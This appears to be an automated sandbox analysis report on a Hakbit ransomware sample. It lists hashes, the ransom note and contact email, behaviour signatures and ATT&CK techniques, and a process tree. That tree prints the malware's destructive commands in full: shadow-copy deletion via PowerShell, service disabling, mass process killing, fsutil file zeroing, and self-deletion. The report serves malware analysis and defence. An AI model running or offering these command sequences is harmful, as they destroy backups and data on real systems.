Overview

overview

10

Static

static

3

69c56d12ed...6b.exe

windows7-x64

10

69c56d12ed...6b.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    23/01/2025, 02:37 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

  • Size

    80KB

  • MD5

    8152a3d0d76f7e968597f4f834fdfa9d

  • SHA1

    c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e

  • SHA256

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b

  • SHA512

    eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4

  • SSDEEP

    1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0

Score
10/10
hakbitcredential_accessdefense_evasiondiscoveryexecutionransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note
To recover your data contact the email below potentialenergy@mail.ru Key Identifier: S/XkYGnuRXS0FbMwiRBKLY0EqvKaSltPGSHaCyXbc08BwBfeutGvXpEpLnePncCtFXU16kXFf+IP/DPq2LwcC1BA1CQsHzxK7Jb/K7nWtwd3Pvs56BN/pvSmQwqEYig4N23jLQ3ajjs9OGHq3pGKhbE719Dr6oZDR2FlDZE05AlRzwN019SIiyCt1YldlnjgvSzCMSvDqdepZxcDl+6jJZk5SkzNKBgj+dv8MLdKY3HpyzWMXRIkszjFppPjP4nPuHggoGVbEK1VLjjmyTm63AMe6k16DETXyzKNM6QwQMg3ic9DsN9I2EK639q6O2QRq85BhG6rQFsPuFv1upaSkz6D+wrAvg3yxhq9D/E/QKQtja8YjhHRq5xMuvJ3GAq+TdYyv0QAgw+65t2MHLGMBi8xEaah86GXcvecvfZhtRm7q3RzZ3/DuxGw1zCc+3hDJYMwL8URM13mZRQDWK9yUejFWvTbnvfONpbxDQa4/tTaJ1vLZeETKHRean5xXUymaKa7jNGeWYVTJ1aq6vk7p23WUCzAU6i/xHaXZo0EJgKMVmRLWNp7U6z+Sz9tj9UGk2HwrYWYpc+rnzE3t9oT97S5jRfE/eT9M1gH9ewWmd5qx2SzrQqbo2nhLxf7VwrCz1RHYN0uCVERRNWmsQw/AqAT7oMJ/2+GyPhs0MpeZfA= Number of files that were processed is: 468
Emails

potentialenergy@mail.ru

Signatures

  • Disables service(s) 3 TTPs
    defense_evasionexecution
  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

    ransomwarehakbit
  • Hakbit family
    hakbit
  • Renames multiple (53) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Kills process with taskkill 47 IoCs
    defense_evasion
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
    "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
    1⤵
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2124
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
      2⤵
        PID:2592
      • C:\Windows\system32\sc.exe
        "sc.exe" config SQLTELEMETRY start= disabled
        2⤵
        • Launches sc.exe
        PID:1236
      • C:\Windows\system32\sc.exe
        "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
        2⤵
        • Launches sc.exe
        PID:2560
      • C:\Windows\system32\sc.exe
        "sc.exe" config SQLWriter start= disabled
        2⤵
        • Launches sc.exe
        PID:796
      • C:\Windows\system32\sc.exe
        "sc.exe" config SstpSvc start= disabled
        2⤵
        • Launches sc.exe
        PID:2364
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mspub.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2568
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopqos.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1188
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopservice.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mysqld.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2352
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqbcoreservice.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:908
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM firefoxconfig.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2300
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM agntsvc.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2464
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM thebat.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2260
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM steam.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM encsvc.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2808
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM excel.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2864
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM CNTAoSMgr.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2888
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlwriter.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2860
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM tbirdconfig.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2784
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM dbeng50.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2668
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM thebat64.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2480
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM ocomm.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1752
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM infopath.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2900
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mbamtray.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2284
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM zoolz.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2824
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" IM thunderbird.exe /F
        2⤵
        • Kills process with taskkill
        PID:2688
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM dbsnmp.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2832
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM xfssvccon.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2828
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mspub.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2772
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM Ntrtscan.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2880
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM isqlplussvc.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM onenote.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2672
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM PccNTMon.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1840
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM msaccess.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2736
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM outlook.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1732
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM tmlisten.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2152
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM msftesql.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1512
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM powerpnt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1464
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopqos.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1212
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM visio.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:764
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopservice.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1284
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM winword.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1436
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mysqld-nt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1656
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM wordpad.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2416
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mysqld-opt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1660
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM ocautoupds.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1984
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM ocssd.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:536
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM oracle.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:840
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlagent.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2944
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlbrowser.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1960
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlservr.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1560
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM synctime.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1172
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1072
      • C:\Windows\System32\notepad.exe
        "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:2664
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        PID:844
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.7 -n 3
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2248
        • C:\Windows\system32\fsutil.exe
          fsutil file setZeroData offset=0 length=524288 “%s”
          3⤵
            PID:3216
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
          2⤵
          • Deletes itself
          PID:2960
          • C:\Windows\system32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:1636

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        System Services

        1
        T1569

        Service Execution

        1
        T1569.002

        Persistence

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Privilege Escalation

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Defense Evasion

        Credential Access

        Credentials from Password Stores

        2
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Windows Credential Manager

        1
        T1555.004

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Browser Information Discovery

        1
        T1217

        Remote System Discovery

        1
        T1018

        System Information Discovery

        1
        T1082

        System Network Configuration Discovery

        1
        T1016

        Internet Connection Discovery

        1
        T1016.001

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Exfiltration

        Impact

        Service Stop

        1
        T1489

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck.energy[potentialenergy@mail.ru]
          Filesize

          4KB

          MD5

          389e4c07e4fe5e3b9cff23f1c40d79e8

          SHA1

          ab0e7cf9f799f7cbf6986aa7d8520d7ea95c68e8

          SHA256

          a1e8d5c078cd08305e140d78b6b9f0868fa9b1ff219ffd914f8ef680963bf8f6

          SHA512

          fa8eca41c70679814c1b6fa9501f53863b1d8b3f7a3b8c647a90406a87a52a42f925ffe68e8bd455e70bc52a7fe1f0640467c562a3a0913a39fa0df7c835aff5

          Download Submit

        • C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[potentialenergy@mail.ru]
          Filesize

          180KB

          MD5

          effa57af7b66fa8ad077ece4924244e1

          SHA1

          6cd9dd92eb0249d18d11c64bf216c2c3edf7b542

          SHA256

          4327d8bf4d96705c57582eda5a50657a6627b53718e586c7764d3409bb1975f0

          SHA512

          8a60d55c5b29cd22c57db539be4b4a981c6d6b56aa1412f88113c42118223a9d730acdcfadcab529d3fb2213ff0c40ada6e3fc676b934f86fc42ab17717315b7

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          67ff76385e2e15edbe06b2dc421b391a

          SHA1

          de1dd541e77a58df23603412681eda05e5cec9f3

          SHA256

          f225cab4cfc06724a3cbe9761c85ebce12659b92af8dd0b53c6494ef87ae6b05

          SHA512

          576271f8e901ae3ffe819d7bfc10522f195df8e14a9edc7c68293fd8282c446839405a33a371f00ad3c8cb27f8fb515a4cef41f4b03c1dd8aaa080829a5e2a6c

          Download Submit

        • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
          Filesize

          828B

          MD5

          084d35f9c4e972ede81a28c700f13112

          SHA1

          dccdc35479ad6c2fc96ee184866e6088d57915c5

          SHA256

          230699358af8fa506abd672d55f9c89de27bfab0adb371738fb345a24b336a6b

          SHA512

          bae536710ff25391715ad4ecb660f999bab3f4d9adb5d44548908d918394b60cf352891e68b2f7c029771c7690bcd418d72b4e47bbea94336c7c0ec68640325f

          Download Submit

        • C:\Users\Admin\Desktop\OpenBackup.xlsx.energy[potentialenergy@mail.ru]
          Filesize

          16KB

          MD5

          9da97f78624798f4fa31f2909daf4d93

          SHA1

          889a0e0f1252a86e689d21590dcfc5f4bce65c13

          SHA256

          a59e417ddea17a506a6499ab5c83da97c7056e9b5aeb5f709e51c915b71106d2

          SHA512

          74db5a5b4cdb8fe92970c71f2dd1a11524241883ece126e5d63a05b5c88c055b03920b0b5e1ab4a9e69a0fe0951c3a5cea0b8b641a9915ba1c6b17bcb90b6f8c

          Download Submit

        • memory/1072-8-0x000000001B580000-0x000000001B862000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/1072-9-0x0000000002990000-0x0000000002998000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2124-278-0x000007FEF67F3000-0x000007FEF67F4000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2124-0-0x000007FEF67F3000-0x000007FEF67F4000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2124-311-0x000007FEF67F0000-0x000007FEF71DC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2124-3-0x000007FEF67F0000-0x000007FEF71DC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2124-1-0x0000000000D70000-0x0000000000D8A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2124-575-0x000007FEF67F0000-0x000007FEF71DC000-memory.dmp

          Filesize

          9.9MB

          Download

        We care about your privacy.

        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.